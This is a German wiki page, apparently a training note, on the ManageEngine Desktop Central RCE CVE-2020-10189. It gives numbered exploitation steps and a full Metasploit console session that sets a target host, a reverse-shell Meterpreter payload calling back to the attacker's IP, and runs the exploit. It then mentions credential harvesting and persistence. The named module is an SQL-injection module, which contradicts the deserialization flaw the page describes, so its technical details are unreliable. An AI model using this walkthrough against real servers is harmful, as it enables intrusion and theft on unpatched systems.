Manager Central Schwachstelle

Aus Xinux Wiki
Version vom 28. August 2024, 15:47 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „== Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189) == '''Schwachstelle''': Die Schwachstelle in ManageEngine Desktop Central (z. B. C…“)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189)

Schwachstelle: Die Schwachstelle in ManageEngine Desktop Central (z. B. CVE-2020-10189) ermöglicht eine Remote Code Execution (RCE) durch unsichere Deserialisierung von Daten in ungepatchten Versionen. Dies ermöglicht es einem Angreifer, beliebigen Code auf dem Server auszuführen.

Angriffspunkt: Die Schwachstelle befindet sich in der Verwaltungsschnittstelle von Desktop Central, die standardmäßig auf einem Webserver läuft. Angreifer können speziell gestaltete HTTP-Anfragen an den Server senden, um unsichere Deserialisierung auszulösen und bösartigen Code auszuführen.

Ausnutzung: Ein Angreifer kann ein speziell entwickeltes Exploit-Tool (z. B. Metasploit-Modul) verwenden, um die Schwachstelle auszunutzen und eine Remoteshell zu erhalten. Der Exploit nutzt unsichere Deserialisierungspraktiken im Servercode aus, um die Kontrolle zu erlangen.

Schritte zur Ausnutzung

  1. Überprüfe die Version von ManageEngine Desktop Central, um festzustellen, ob sie anfällig ist.
  2. Verwende Metasploit, um den passenden Exploit zu finden, der die Schwachstelle ausnutzt.
  3. Konfiguriere den Exploit mit der Ziel-IP-Adresse (RHOSTS), deiner IP-Adresse (LHOST), und setze den Payload (z. B. `java/meterpreter/reverse_tcp`).
  4. Starte den Exploit. Wenn der Exploit erfolgreich ist, erhält der Angreifer eine Meterpreter-Sitzung und damit vollen Zugriff auf das System.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Server auszuführen, was zur vollständigen Kompromittierung des Systems führen kann.
  • Ungepatchte Systeme: Viele Organisationen haben es möglicherweise versäumt, ihre Systeme zu aktualisieren, was sie anfällig macht.
  • Weitreichende Auswirkungen: Ein erfolgreicher Angriff kann nicht nur das kompromittierte System gefährden, sondern auch dazu verwendet werden, sich lateral im Netzwerk zu bewegen und andere Systeme zu infizieren.
  • Einfacher Zugang: Wenn der Webserver öffentlich zugänglich ist und keine Sicherheitsmaßnahmen wie Firewalls oder zusätzliche Authentifizierungen vorhanden sind, kann der Angriff sehr einfach durchgeführt werden.

Beispiel für Metasploit-Konfiguration

Um die Schwachstelle auszunutzen, kann folgendes Metasploit-Modul verwendet werden:

msf6 > use exploit/windows/http/manageengine_dc_pmp_sqli_rce msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RHOSTS 10.0.10.107 msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RPORT 8022 msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LHOST <deine_IP> msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LPORT 4444 msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > run

Nach erfolgreichem Exploit erhält der Angreifer eine Meterpreter-Sitzung und kann weitergehende Post-Exploitation-Schritte durchführen, wie das Sammeln von Anmeldeinformationen, Dateisystemmanipulationen und das Einrichten von Persistenz.

Abgerufen von „http://wiki.ixheim.de/index.php?title=Manager_Central_Schwachstelle&oldid=55916